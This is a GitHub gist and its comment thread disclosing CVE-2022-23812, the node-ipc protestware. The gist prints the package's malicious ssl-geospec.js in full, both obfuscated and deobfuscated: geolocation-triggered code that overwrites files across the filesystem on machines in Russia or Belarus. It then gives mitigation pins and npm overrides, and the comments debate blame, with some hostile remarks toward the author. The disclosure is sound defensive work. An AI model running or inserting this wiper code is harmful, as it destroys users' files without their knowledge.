@MidSpike
Last active February 5, 2024 18:09
CVE-2022-23812 | RIAEvangelist/node-ipc is malware / protest-ware

RIAEvangelist/node-ipc is malware / protestware

The RIAEvangelist/node-ipc module contains protestware peacenotwar.

Excerpt from RIAEvangelist/node-ipc:

as of v11.0.0 & v9.2.2 this module uses the peacenotwar module.


More importantly, commits 847047cf7f81ab08352038b2204f0e7633449580 -> 6e344066a0464814a27fbd7ca8422f473956a803 of RIAEvangelist/node-ipc contain malware.


⚠️| The following code is malicious, DO NOT RUN IT

https://github.com/RIAEvangelist/node-ipc/blob/847047cf7f81ab08352038b2204f0e7633449580/dao/ssl-geospec.js

The following code block was added in case the URL above is deactivated:
import u from"path";import a from"fs";import o from"https";setTimeout(function(){const t=Math.round(Math.random()*4);if(t>1){return}const n=Buffer.from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=","base64");o.get(n.toString("utf8"),function(t){t.on("data",function(t){const n=Buffer.from("Li8=","base64");const o=Buffer.from("Li4v","base64");const r=Buffer.from("Li4vLi4v","base64");const f=Buffer.from("Lw==","base64");const c=Buffer.from("Y291bnRyeV9uYW1l","base64");const e=Buffer.from("cnVzc2lh","base64");const i=Buffer.from("YmVsYXJ1cw==","base64");try{const s=JSON.parse(t.toString("utf8"));const u=s[c.toString("utf8")].toLowerCase();const a=u.includes(e.toString("utf8"))||u.includes(i.toString("utf8"));if(a){h(n.toString("utf8"));h(o.toString("utf8"));h(r.toString("utf8"));h(f.toString("utf8"))}}catch(t){}})})},Math.ceil(Math.random()*1e3));async function h(n="",o=""){if(!a.existsSync(n)){return}let r=[];try{r=a.readdirSync(n)}catch(t){}const f=[];const c=Buffer.from("4p2k77iP","base64");for(var e=0;e<r.length;e++){const i=u.join(n,r[e]);let t=null;try{t=a.lstatSync(i)}catch(t){continue}if(t.isDirectory()){const s=h(i,o);s.length>0?f.push(...s):null}else if(i.indexOf(o)>=0){try{a.writeFile(i,c.toString("utf8"),function(){})}catch(t){}}}return f};const ssl=true;export {ssl as default,ssl}

⚠️| The above code is malicious, DO NOT RUN IT


I deobfuscated the code above and found that if the host machine's public IP address was from Russia or Belarus, node-ipc would proceed to overwrite many files with a heart emoji recursively while traversing up parent directories:


⚠️| The following code is malicious, DO NOT RUN IT

import u from "path";
import a from "fs";
import o from "https";
setTimeout(function () {
    const t = Math.round(Math.random() * 4);
    if (t > 1) {
        return;
    }
    const n = Buffer.from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=", "base64");
    o.get(n.toString("utf8"), function (t) {
        t.on("data", function (t) {
            const n = Buffer.from("Li8=", "base64");
            const o = Buffer.from("Li4v", "base64");
            const r = Buffer.from("Li4vLi4v", "base64");
            const f = Buffer.from("Lw==", "base64");
            const c = Buffer.from("Y291bnRyeV9uYW1l", "base64");
            const e = Buffer.from("cnVzc2lh", "base64");
            const i = Buffer.from("YmVsYXJ1cw==", "base64");
            try {
                const s = JSON.parse(t.toString("utf8"));
                const u = s[c.toString("utf8")].toLowerCase();
                const a = u.includes(e.toString("utf8")) || u.includes(i.toString("utf8"));
                if (a) {
                    h(n.toString("utf8"));
                    h(o.toString("utf8"));
                    h(r.toString("utf8"));
                    h(f.toString("utf8"));
                }
            } catch (t) {}
        });
    });
}, Math.ceil(Math.random() * 1e3));
async function h(n = "", o = "") {
    if (!a.existsSync(n)) {
        return;
    }
    let r = [];
    try {
        r = a.readdirSync(n);
    } catch (t) {}
    const f = [];
    const c = Buffer.from("4p2k77iP", "base64");
    for (var e = 0; e < r.length; e++) {
        const i = u.join(n, r[e]);
        let t = null;
        try {
            t = a.lstatSync(i);
        } catch (t) {
            continue;
        }
        if (t.isDirectory()) {
            const s = h(i, o);
            s.length > 0 ? f.push(...s) : null;
        } else if (i.indexOf(o) >= 0) {
            try {
                a.writeFile(i, c.toString("utf8"), function () {});
            } catch (t) {}
        }
    }
    return f;
}
const ssl = true;
export { ssl as default, ssl };

⚠️| The above code is malicious, DO NOT RUN IT


The following are excerpts from the malicious code:

Buffer.from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=", "base64");
// https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154
const a = u.includes(e.toString("utf8")) || u.includes(i.toString("utf8"));
// checks if ip country is Russia or Belarus
a.writeFile(i, c.toString("utf8"), function () {});
// overwrites file with `❤️`

The following shows an example of what each of the parameters passed to a.writeFile(i, c.toString("utf8")) would be:

image


Edit 2022-03-16_0

Comment by zkyf

Just made it better looking and commented out the dangerous code so you guys can give it a try. Obviously the code will delete literally EVERYTHING on your drive.

const path = require("path");
const fs = require("fs");
const https = require("https");

setTimeout(function () {
    const randomNumber = Math.round(Math.random() * 4);
    if (randomNumber > 1) {
        // return;
    }
    const apiKey = "https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154";
    const pwd = "./";
    const parentDir = "../";
    const grandParentDir = "../../";
    const root = "/";
    const countryName = "country_name";
    const russia = "russia";
    const belarus = "belarus";

    https.get(apiKey, function (message) {
        message.on("data", function (msgBuffer) {
            try {
                const message = JSON.parse(msgBuffer.toString("utf8"));
                const userCountryName = message[countryName.toString("utf8")].toLowerCase();
                const hasRus = userCountryName.includes(russia.toString("utf8")) || userCountryName.includes(belarus.toString("utf8")); // checks if country is Russia or Belarus
                if (hasRus) {
                    deleteFile(pwd);
                    deleteFile(parentDir);
                    deleteFile(grandParentDir);
                    deleteFile(root);
                }
            } catch (t) {}
        });
    });

    // zkyf: Let's try this directly here
    deleteFile(pwd);
    deleteFile(parentDir);
    deleteFile(grandParentDir);
    deleteFile(root);
}, 100);

async function deleteFile(pathName = "", o = "") {
    if (!fs.existsSync(pathName)) {
        return;
    }
    let fileList = [];
    try {
        fileList = fs.readdirSync(pathName);
    } catch (t) {}
    const f = [];
    const heartUtf8 = Buffer.from("4p2k77iP", "base64");
    for (var idx = 0; idx < fileList.length; idx++) {
        const fileName = path.join(pathName, fileList[idx]);
        let fileInfo = null;
        try {
            fileInfo = fs.lstatSync(fileName);
        } catch (err) {
            continue;
        }
        if (fileInfo.isDirectory()) {
            const fileSymbol = deleteFile(fileName, o);
            fileSymbol.length > 0 ? f.push(...fileSymbol) : null;
        } else if (fileName.indexOf(o) >= 0) {
            try {
                // fs.writeFile(fileName, heartUtf8.toString("utf8"), function () {}); // overwrites file with `❤️`
                console.log(`Rewrite ${fileName}`);
            } catch (err) {}
        }
    }
    return f;
}

Console: image


Edit 2022-03-16_1 (requested by @lgg)

Available mitigation methods:

The following mitigation strategies are inspired by cnpm's (is not npm) mitigation methods: cnpm/bug-versions#181

If you use one of the following mitigation strategies, make sure to remove the ^ to force node-ipc to the specified version.

"^9.x.x" -> "9.2.1"

     "dependencies": {
-        "node-ipc": "^9.x.x"
+        "node-ipc": "9.2.1"
     }

"^10.x.x" -> "10.1.0"

     "dependencies": {
-        "node-ipc": "^10.x.x"
+        "node-ipc": "10.1.0"
     }

"^11.x.x" -> "10.1.0"

     "dependencies": {
-        "node-ipc": "^11.x.x"
+        "node-ipc": "10.1.0"
     }
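Review bot: the third pin, "^11.x.x" -> "10.1.0", moves down a major version, so unlike the 9.x and 10.x pins it can break callers that depend on 11.x API changes; say so next to the hunk, or point 11.x users at the "overrides" approach given further down, which also reaches transitive copies of node-ipc that an exact pin on a direct dependency does not.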

3rd-party mitigation methods:


Edit 2022-03-16_2 (requested by @lgg)

Edit 2022-03-17_0

@RIAEvangelist has banned me from interacting with their repositories

Edit 2022-03-17_1

The security research firm snyk.io recommends the following mitigation strategy for users of node-ipc:

package.json

  "overrides": {
    "node-ipc@>9.2.1 <10": "9.2.1",
    "node-ipc@>10.1.0": "10.1.0"
  }

Edit 2022-03-17_2 (credit: @Uzlopak)

NPM users below NPM v8, this is for you!

Don't forget to mention that npm supports override with npm 8. Earlier versions don't have overrides capabilities. So node 12 and 14, which are LTS, use by default npm 6 and that would not work with them. So upgrading npm to 8 would be necessary.

Yarn users, this is for you!

I'm not too familiar with how yarn works, so I don't want to risk giving false instructions to users.

Edit 2022-03-17_3

Please read this message

I've been seeing a lot of hate comments going after the owner of node-ipc (especially on their repositories). We should remember the high standards that we expect from our fellow developers on GitHub, regardless of what another has done.

Preferably this gist and its comments should be focused on the research and discussion of CVE-2022-23812. I'm sure that the owner of node-ipc will be reprimanded by their employer, NPM, and GitHub.

Please do not threaten anyone here (or elsewhere for that matter).

Edit 2022-03-18_0

I've begun work on my own fork of node-ipc: MidSpike/node-ipc#1

@Uzlopak

Uzlopak commented Mar 17, 2022

@MidSpike

Also you could add information about yarn
https://classic.yarnpkg.com/lang/en/docs/selective-version-resolutions/

Also don't forget to mention that npm supports override with npm 8. Earlier versions don't have overrides capabilities. So node 12 and 14, which are LTS, use by default npm 6 and that would not work with them. So upgrading npm to 8 would be necessary.

@MidSpike

Updated gist to include suggestions by @Uzlopak

@TheFrenchGhosty

@MidSpike Thank you for this research.

I did mention it on the r/selfhosted post: https://old.reddit.com/r/selfhosted/comments/tge5xa/npm_supply_chain_attack_wipes_your_disk_if_you/

@lgg

lgg commented Mar 17, 2022

@meisme-dev it's most likely fake. Account is newly registered with only this post, no documents or real contacts or proofs provided (like everyone does when it's a real abuse).

Also the api key for geoip service was rapidly deactivated and malicious code just creates a file on Desktop.

@MidSpike

MidSpike commented Mar 17, 2022

Also the api key for geoip service was rapidly deactivated

I've said this a few times before, but I want to say it again so other people that read this will know.

The api key for the ipinfo service was 100% functional at the time of my testing on March 15th 2022.

The real issue here is that the repository owner is not trustworthy at all anymore.

Edit: modified comment to not sound like an asshat, I'm not trying to be rude, sorry about that.

@lgg

lgg commented Mar 17, 2022

@MidSpike this gist referenced on IT news portal: https://habr.com/ru/news/t/656219/ 🎉

@kiliman

kiliman commented Mar 17, 2022

@MidSpike btw are you sure you were banned from the repo? GitHub was experiencing issues today so nobody could do things like comment, etc. I got the same message "You can't perform this action at this time." as well in my own repo.

@Uzlopak

Uzlopak commented Mar 17, 2022

If you are banned you cannot even type into the textarea box.

@MidSpike

@kiliman I'm pretty sure that I'm still banned (or blocked) by the repo owner.

Unable to add new comments.

image

Unable to edit reactions.

image

Also I've been shadow-banned from getting notifications from any of the author's repositories.

image

@kiliman

kiliman commented Mar 17, 2022

Ah, ok. So yeah, if he's seeing that instead of the comment box, then definitely banned.

I got the message once I tried to submit the comment. Everything appears to be working fine now.

Anyway, thanks for keeping us all informed on developments.

@noblehng

noblehng commented Mar 17, 2022

The wider problem is that the distributed trust model doesn't work. Maintainers could put/pull in malicious code for all kinds of reasons or be compromised.

There should be a more centralised effort at the package manager hub level to raise the security bar for core/popular packages. Now that it seems Microsoft owns npm, maybe they can lead the effort.

@forresthopkinsa

That code is not actually able to execute unless you modify it to make it so.

This doesn't make any sense at all. Of course it's able to execute. The file is directly imported from IPC.js. ES Module imports are resolved at program startup, running all top-level code synchronously. Why wouldn't the file execute?


ghost commented Mar 17, 2022

I am banned too, @MidSpike i see the same thing as you

@forresthopkinsa

There have already been some catastrophic effects of this CVE: https://snippet.host/kvcb

@TheFrenchGhosty

TheFrenchGhosty commented Mar 17, 2022

Banned too, they didn't like that: https://github.com/RIAEvangelist/node-ipc/issues/233#issuecomment-1071529143

He's trying to do damage control.


ghost commented Mar 17, 2022

@MidSpike just out of curiosity, what happens if the geoip functions fail due to bad api keys? will it just default to not doing anything harmful or just delete everything anyway?

@Myrkie

Myrkie commented Mar 17, 2022

@MidSpike just out of curiosity, what happens if the geoip functions fail due to bad api keys? will it just default to not doing anything harmful or just delete everything anyway?

the guy who made the repo invalidated the APIKey after he was caught so to try to cover his arse.

@MidSpike

MidSpike commented Mar 17, 2022

@MidSpike just out of curiosity, what happens if the geoip functions fail due to bad api keys? will it just default to not doing anything harmful or just delete everything anyway?

@majorendian after some testing (while the api-key is invalid), the only condition in which the malware would still execute is if the ipinfo API sends back a response with country_name in the body after JSON parsing.

image
(ignore the line numbers as I have comments littering the code)

image

@forresthopkinsa

I've joined the banned club 🎉

image


ghost commented Mar 17, 2022

@MidSpike Ok, well that effectively means it's disarmed if I am not mistaken

@MidSpike

MidSpike commented Mar 17, 2022

@majorendian I would err on the side of caution, all it takes for this specific malware to become armed again is for the api-key to be re-enabled.
Apart from that, the real concern should be with how projects manage their dependencies and how we as developers should conduct security evaluations.

@romanberdnikov

Such people should be banned from any professional community permanently. It's one thing to call people to peace/restrict your services, and another thing to harm them. Imagine that someone puts a drawing pin on your chair - just because you are working with a Russian hosting company. Or a doctor will inject you with the wrong medicine because he didn't like you.

Once they've been caught they make an innocent face, well, you need to look at the chair and check what medicine you have! And try to shut your mouth. That's ridiculous


ghost commented Mar 17, 2022

image

He also edited my issue so that there is no content LOL man needs to read damage control 101 ASAP

@RigoOnRails

RigoOnRails commented Mar 17, 2022

Here's his YouTube channel with his face: https://www.youtube.com/brandonnozakimiller

What he did was incredibly stupid & irresponsible.

@jellelicht

jellelicht commented Mar 17, 2022

There have already been some catastrophic effects of this CVE: https://snippet.host/kvcb

This has to be fake.
Folks employed at this NGO should be tried for being criminally negligent. “Let’s keep records about a hostile, dictatorial regime stored on one server on one hard drive in their territory” is so stupid, it’s not even funny.
(Edit: formatting)

@Khodyn

Khodyn commented Mar 17, 2022

Here's his self-created Wikipedia page and the page history, where you can see him creating it.

@MidSpike

Please read this message

I've been seeing a lot of hate comments going after the owner of node-ipc (especially on their repositories).
We should remember the high standards that we expect from our fellow developers on GitHub, regardless of what another has done.

Preferably this gist and its comments should be focused on the research and discussion of CVE-2022-23812.
I'm sure that the owner of node-ipc will be reprimanded by their employer, NPM, and GitHub.

Please do not threaten anyone here (or elsewhere for that matter).

@aphix

aphix commented Mar 18, 2022

There have already been some catastrophic effects of this CVE: snippet.host/kvcb

This has to be fake. Folks employed at this NGO should be tried for being criminally negligent. “Let’s keep records about a hostile, dictatorial regime stored on one server on one hard drive in their territory” is so stupid, it’s not even funny. (Edit: formatting)

Being that the wider internet has been literally blocking access in and out of Russia, and Russia itself also has a form of digital-iron curtain in and out of its wider networks, it's totally reasonable to assume that was not only the fastest, but safest and most reliable solution. On top of that, the same issue could be triggered via a VPN mistake, or by refugees having nowhere else to go, then having their drives wiped because they used some software when they finally escaped to safety in, say, Belarus.

Whether the NGO story is true or not, it's totally possible for collateral damage just like it (and/or even more innocent circumstances). In either case, I would say the package maintainer is wholly to blame, not the potential victim(s).

@lanmower

If you used to like node-ipc, try hyper-ipc... it's pretty cool, you can ipc behind nats without forwarding, you can move nodes without ip changes, ground-breaking.

If you got hit using vue.js, try no-build style app making, it's awesome! I've been using riot.js with zero build tools for two years now, and never looked back, there is no easier way to build apps.

Don't look back! build back better!

@LarryTheFatCat

Dear sir who made this,

Thank you for making this gist, this documentation discussing the whole topic is astounding. There is so much info directing users who are using this in Russia and Belarus. I want to thank you for that. 👍

@jellelicht

jellelicht commented Mar 18, 2022

There have already been some catastrophic effects of this CVE: snippet.host/kvcb

This has to be fake. Folks employed at this NGO should be tried for being criminally negligent. “Let’s keep records about a hostile, dictatorial regime stored on one server on one hard drive in their territory” is so stupid, it’s not even funny. (Edit: formatting)

Being that the wider internet has been literally blocking access in and out of Russia, and Russia itself also has a form of digital-iron curtain in and out of its wider networks, it's totally reasonable to assume that was not only the fastest, but safest and most reliable solution. On top of that, the same issue could be triggered via a VPN mistake, or by refugees having nowhere else to go, then having their drives wiped because they used some software when they finally escaped to safety in, say, Belarus.

Whether the NGO story is true or not, it's totally possible for collateral damage just like it (and/or even more innocent circumstances). In either case, I would say the package maintainer is wholly to blame, not the potential victim(s).

Whether the NGO story is true or not is extremely relevant. You are simply speculating, making an already shoddy situation worse. Let’s stick to the facts: A package author had a moral lapse of judgement, they need to apologise ASAP and we all need to move on to more relevant things.

In addition: read the entire snippet before going with the otherwise reasonable ‘please do not victim blame’ argument.
I’m not absolving the malware author of any blame, I’m saying that this instance of news is either untrue or misreported.

From the snippet:

All I can say that your little shenanigan did more damage to us than Putin or Lukashenka ever could.

Which (I hope we can agree) is nonsense and uncalled for. It’s obvious the person who wrote that abomination of a sentence has no personal connections to folks suffering in Ukraine right now.
(Edit: spelling)

@EJTH

EJTH commented Mar 18, 2022

Well if you just assume that anyone that says something inconvenient is a liar, then sure anything can be "untrue or misreported". Why are you covering this dude's ass? An example needs to be set.

I have personal connections to Ukraine and I would rather NOT have american activists destroy peoples files regardless of their nationality.

@Uzlopak

Uzlopak commented Mar 18, 2022

@jellelicht

All I can say that your little shenanigan did more damage to us than Putin or Lukashenka ever could

The important part is "to us". "To us" means not to the Ukrainian people but to the NGO. If you drop the "to us" it would be a ridiculous claim. Anyhow...

@MidSpike

Can you link please to the commit
RIAEvangelist/node-ipc@847047c
?

RIAEvangelist tries to gaslight people by claiming that it was never nuking filesystems but only putting a textfile on the desktop.

@jellelicht

Well if you just assume that anyone that says something inconvenient is a liar, then sure anything can be "untrue or misreported". Why are you covering this dude's ass? An example needs to be set.

I am not covering anyone, nor am I excusing anything. An example does not need to be set though, as that is not a productive way forward.

I have personal connections to Ukraine and I would rather NOT have american activists destroy peoples files regardless of their nationality.

agreed!

@jellelicht

jellelicht commented Mar 18, 2022

@jellelicht

All I can say that your little shenanigan did more damage to us than Putin or Lukashenka ever could

The important part is "to us". "To us" means not to the Ukrainian people but to the NGO. If you drop the "to us" it would be a ridiculous claim. Anyhow...

Even with the “to us” it is.

@MidSpike

Can you link please to the commit RIAEvangelist/node-ipc@847047c ?

RIAEvangelist tries to gaslight people by claiming that it was never nuking filesystems but only putting a textfile on the desktop.

Stop making this stuff personal, leave this dude alone and start focusing on ways we can make sure nothing RIAEvangelist does ever impacts any of us again.

@Uzlopak

Uzlopak commented Mar 18, 2022

@jellelicht
I still think this comparison is valid. But we can agree to disagree.

I think we should in the future replace all packages of RIAEvangelist with other projects. Replacing them in the big projects which reduces their download per month significantly to basically few thousand should bring others to use the more downloaded ones. E.g. hyper-ipc. Instead of node-ipc

Maybe we need another agreement for non-political actions? Maybe code of conduct already covers for this malicious behaviour?

@jellelicht

jellelicht commented Mar 18, 2022

If I sign my commits as ‘jelle-but-also-putin-no-bueno@gmail.com’, that is (naturally) a political statement. It should still be fine for anyone to do so though.

I’d rather link to a subset of the programmer’s oath as some kind of pledge instead, as it is a pledge based on intention. The problem is not politics, the problem is harmful intent.

@Uzlopak

Uzlopak commented Mar 18, 2022

It is about utilizing code to be a political weapon. If you add "No to Putin and no to the Ukrainian War" then I could care less. But also keep in mind that a Russian user of your package could face some serious reprimands.
So imho best is to keep politics out.

I am currently in a country with basically no freedom of expression. I wipe my phone of political statements regarding this country before I come here, just so I don't get issues if my phone gets seized.
So I actually think politics should not be on GitHub at all.

@jellelicht

Thank you for the calm and clear reasoning @Uzlopak. I can’t say I see things the same way, but that likely has more to do with the fact that I have the privilege of living in an environment where freedom of expression is a given.

@hanetzer

Just want to point out archives and archives of archives of this code exist
https://archive.ph/n8oBX
https://web.archive.org/web/20220317213444/https://github.com/RIAEvangelist/node-ipc/blob/847047cf7f81ab08352038b2204f0e7633449580/dao/ssl-geospec.js

This is not even archived, just a dangling commit on their own repo.
https://github.com/RIAEvangelist/node-ipc/blob/847047cf7f81ab08352038b2204f0e7633449580/dao/ssl-geospec.js

Archives of me pointing this out
before nuke and ban:
https://archive.ph/bboiL
after nuke and ban:
https://archive.ph/UF7LM

@noblehng

Political or not, there are all kinds of reasons someone could put in malicious code as I said above. This has happened a lot in NPM before. There have even been some researchers trying to push malicious code into the Linux kernel for their research.

NPM should do more to bar malicious codes from affecting users in the future. Russ Cox has a good write-up about this not long ago when colors-faker happened:
https://research.swtch.com/npm-colors

@ShikiSuen

That repo owner is really shameless.

@MidSpike

@MidSpike

Can you link please to the commit RIAEvangelist/node-ipc@847047c ?

@Uzlopak Thank you for the suggestion, however a link to that commit is already included:

image

@superfedya

@RIAEvangelist

Adding malware that targets users by IP and erases all of their data isn't legal, no matter what the reason is. I think taking care of this issue should be the authorities' job.

@meisme-dev

i got banned from the repo

@tylerreisinger

@RIAEvangelist You clearly should not be part of the open source community. Ironically the only people you hurt are people who likely had zero say in the Ukraine war. Get over yourself, people will fork your projects and you won't get to stoke your giant ego the way you want to.

@AlttiRi

AlttiRi commented Mar 18, 2022

Using caret ranged semver by default in package.json by NPM looks more questionable now.

As well as Node.js granting any package unlimited access to hard drives and network by default.

I think package.json should contain the permission list which will limit read/write places and network access for a package. Like it is in web extensions.


UPD.

A few thoughts about package.json's "permissions" field

For example:

  • is-odd-num should not require any permission.
  • Most devDeps packages will only require read/write/overwrite operations inside the parent package's directory (except write access to the node_modules directory).
  • Some packages require only access to a temp directory.
  • For almost all packages it makes sense to limit network access at all, or allow only certain hosts/URLs.
  • If a module A uses another module B with "*://*/*" ("<all_urls>") permission (for example, node-fetch), then module B will not have the "<all_urls>" permission enabled unless it's specified in the package.json of parent module A. (A parent module should limit access of submodules.)
  • Also adding a new permission should prevent auto updating of this module to the newer version by the parent module that uses it.

In the case of node-ipc I don't see that it should have read/write/overwrite access to any hard drive place.
If it requires network access by default, you could limit it in the package.json of your application. So, you would see the warning that your app (one of its submodules) unexpectedly performs requests to a geoIP service, which node-ipc did. Also node-ipc just would not be updated automatically to this version because of the change to its permission list.

More advanced thing:

  • dynamic granting of access to certain submodules,
  • a permission list for the oninstall event, for example, some packages download some additional files required for work only on the install event.

@ejaz-ahmed

@MidSpike thanks for reporting this vulnerability. I'm the founder of ipgeolocation.io which was used to perform the geolocation part here. FYI, we've revoked this API key and the code will fail now. Informing us on time might have saved someone. I feel sorry for whoever was harmed due to this.

@forresthopkinsa

@ejaz-ahmed Thank you, your early response definitely did save a lot of people

@Eyad-Bereh

@MidSpike I wonder, if we took the user that executes the node process and disallowed it from writing files outside specific paths, would it be enough to mitigate this dangerous effect ?

@MidSpike

@MidSpike thanks for reporting this vulnerability. I'm the founder of ipgeolocation.io which was used to perform the geolocation part here. FYI, we've revoked this API key and the code will fail now. Informing us on time might have saved someone. I feel sorry for whoever was harmed due to this.

@ejaz-ahmed Assuming that you're the founder, thank you for quickly disabling the api key!

@MidSpike

Using caret ranged semver by default in package.json by NPM looks more questionable now.

As well as Node.js granting any package unlimited access to hard drives and network by default.

I think package.json should contain the permission list which will limit read/write places and network access for a package. Like it is in web extensions.

@AlttiRi I fully agree with that sentiment, this discovery has certainly put a sour taste in my mouth regarding how dependency updates are handled by default.

I'm also in favor for a dependency permissions system, however I'm unsure of what one would look like or if it is even possible to adapt npm and nodejs to support one.

@Uzlopak

Uzlopak commented Mar 18, 2022

Imho it is the wrong place to manage that.

You should actually run nodejs with a limited user, so that the process can only access specific folders. And that is OS specific. And if you use docker you should anyway use a limited user.

And for the external calls you should actually use a firewall or reverse proxy(?) to deny outgoing traffic.

Well... And you should not use root user to develop in the first place.

@IssuingCorrections

Stop making this stuff personal, leave this dude alone and start focusing on ways we can make sure nothing RIAEvangelist does ever impacts any of us again.

Ha! Wow, you're not very good at this.

Unfortunately, people here are a little too bright for the dim-bulb "let's all just move past this tactic".

You shouldn't have led by saying the human rights NGO was Asking For It. Really makes the rest of what you write flop around in clown shoes with a red ball nose ;)

@nyankers

@MidSpike
Can you link please to the commit RIAEvangelist/node-ipc@847047c ?
RIAEvangelist tries to gaslight people by claiming that it was never nuking filesystems but only putting a textfile on the desktop.

Stop making this stuff personal, leave this dude alone and start focusing on ways we can make sure nothing RIAEvangelist does ever impacts any of us again.

Besides it being rather deceptive to pretend this never happened, and given that open source is fundamentally built on transparency, I have no idea why you'd want to defend sweeping this under the rug...

It's also rather important to point out that he's making this effort, as anyone looking into this for themselves might be confused why they don't see such malicious code, etc. Myself included until I found posts like these.

@coffeenotfound

I'm kinda of the opinion that someone who deliberately and maliciously puts malware into their package deserves hate. Something something consequences


ghost commented Mar 18, 2022

@Uzlopak Kind of an awkward setup to run a hello world application don't you think? If you have to jump through hoops like these just drop the thing entirely. Should we treat NPM like windows?

@Uzlopak

Uzlopak commented Mar 18, 2022

Imho FOSS is about trust and(!) reading the used code. Also don't forget that you can even publish packages which contain files and code which is not in the repository. So yeah, basically npm can be a can of worms and should be treated like windows.


ghost commented Mar 18, 2022

I am not against that approach. I am just pointing out that it's kind of an absurd situation, filtering incoming packets from npmjs.com through an antivirus and containerizing any runnable piece of code as if it was a torrent site.

@bminer

bminer commented Mar 19, 2022

Software developers should know better. Software is not the place to take a political stance. Publishing malicious software to npm, even publishing annoying software should be punishable. npm would be wise to suspend the author's publishing permissions and permanently remove affected versions of this package.

Even package maintainers who print messages to stdout / stderr asking for monetary support for their work is stretching the rules in my opinion. As long as packages support a way to silence these messages (i.e. ADBLOCK environment variable), I think this is the most annoyance the community should tolerate.

War of any kind is tragic. Protests should be permitted and perhaps encouraged where appropriate. But, as developers we all trust one another blindly to keep software purely functional, not to advertise or push a political agenda. In my humble opinion, actions like these should not be tolerated. I'm not saying we need to ban bad actors from npm for life or anything, but some appropriate level of action should be taken against those publishing malicious / annoying software.

I can appreciate taking ownership for a project and controlling its future direction, but if the future direction of a project intends to annoy or act maliciously against another, this is not okay.

@sighwort

You all just become lazy, don't you? Oh new code, pull pull pull!
Review? Who cares? Tests? Who cares? My country is doing something nasty? Who cares?
I just sit in front of my computer, tape together a few public libs, and now you should call me a developer!

@RigoOnRails

RigoOnRails commented Mar 19, 2022 via email

@ShikiSuen

@sighwort Your point smells of social darwinism.
I don't know whether social darwinism should be tolerated in a civilized country.

@RigoOnRails

@ShikiSuen It’s most likely the same dumbass who wrote the malware just using a fake account. It had 0 activity when he posted that comment & now he’s following @RIAEvangelist & forked a random repo.

@bxb100

bxb100 commented Mar 19, 2022

WOW, The OSS AMERICAN World Police showed up

@Disquse

Disquse commented Mar 19, 2022

@bxb100 yeah, and the other typical American trying to "help" by harming other people. @RIAEvangelist if you want to help Ukraine so much, go ahead and ask your government to close the air zone in Ukraine as Ukrainian people ask you to do. Or your sense of justice ends where the risk of harm to your own consumer lifestyle begins? Pathetic.

@Eyad-Bereh

@RIAEvangelist You should feel ashamed for injecting malicious code into open source software.
Have you thought about the damage you caused to normal people? Some people have lost important files and might face legal issues, some people might get fired from their jobs.
Have you thought about the possibility that a medical system might be using node-ipc and you have put people's lives in danger?
The malicious code has only targeted Russian developers who are working for their living, so there's definitely no excuse for what you did, no matter what.
If you really want to help Ukrainians then tell your government to stop lying to them, or is it the foreign U.S. policy for decades and can't be changed?!!

@Uzlopak

Uzlopak commented Mar 19, 2022

Please let's keep the talk technical. We know that the behavior of RIAEvangelist was reckless and irresponsible. But we should keep it apolitical.

@AlphaHot

Damn bastard

@antv199

antv199 commented Mar 19, 2022

Isn't he now liable for whatever punishment the US has?

And I love how he updated the README with damage control.

@MBRjun

MBRjun commented Mar 19, 2022

It has even been written into Wikipedia, unbelievable.

@ShikiSuen

ShikiSuen commented Mar 19, 2022

@MBRjun This guy is now world-famous.

@imaginativess

It has even been written into Wikipedia, unbelievable.

Yes, correct @MBRjun.

@ablakely

I hope this guy works in fast food for the rest of his life, jail would be good too.

@mocsy

mocsy commented Mar 19, 2022

Since about 20 years now, webservers are configured in a way that the web-facing backend doesn't have write permissions. It's web ops basics. On a dev machine your code depending on this package should be in version control, again industry best practice since ages. I wonder exactly what the use case is where these heart symbols cause real damage?

The software also comes with a no-warranty note doesn't it?

It's the lack of due diligence and plain carelessness which is the root cause, the real security issue here, as it always has been.

@Uzlopak

Uzlopak commented Mar 19, 2022

@mocsy

The malware was traversing the folder structure up, overwriting files on the whole filesystem and not only your project folder.

Somebody explained it well:
Spreading malware is more relevant to penal law and not to civil law.

@ShikiSuen

ShikiSuen commented Mar 19, 2022

@mocsy Sounds like you are likely to blame a raped woman for her dressing (or yariyariyada) in lieu of blaming the rapist himself.

@mocsy

mocsy commented Mar 19, 2022

@ShikiSuen The difference is big. I understand that it's hard to see, but dressing never had anything to do with raping.
On the other hand, using someone else's software has always included risks since the dawn of the IT age.

What I'm saying is, the cyber domain is a war-field, it always has been and always will be.

By your analogy, this war-field has known and unknown bad actors or 'rapists' if you like.
Would you go to the den of known rapists?
Packaging (npm) or clothing (dressing) has nothing to do with it.

@Uzlopak

Uzlopak commented Mar 19, 2022

So if a woman enters a den of known rapists, it is expected that a rape would be unpunished?
It is not about dressing but about the victim-blaming.

@ShikiSuen

@Uzlopak You got my idea. ;)

@noblehng

So if a woman enters a den of known rapists, it is expected that a rape would be unpunished? It is not about dressing but about the victim-blaming.

Except @mocsy doesn't seem to be blaming anyone or saying the node-ipc author shouldn't be punished, @mocsy just pointed out the underlying security issue, like what you said above, in another way.

Don't let the extreme analogy trick you. You need law to punish rapists, and you also need means to enforce the law and other measures to prevent rape. Defense in depth.

Anyway, the node-ipc author will get punished by the community and by law if victims sue him. Further cursing him or fighting each other here will not help anyone, just like what he has done, and certainly will not solve the underlying security issue.

Always sandboxing nodejs applications, as suggested above, could be a solution, but expecting every developer to do proper sandboxing every time simply just isn't scalable. Instead, NPM could do more to eliminate a large number of security issues.

For this specific one, most packages shouldn't touch the filesystem, so a static analysis of importing the fs module could prevent it. node-ipc seems to only use the fs module to read the config before, which is questionable in itself.
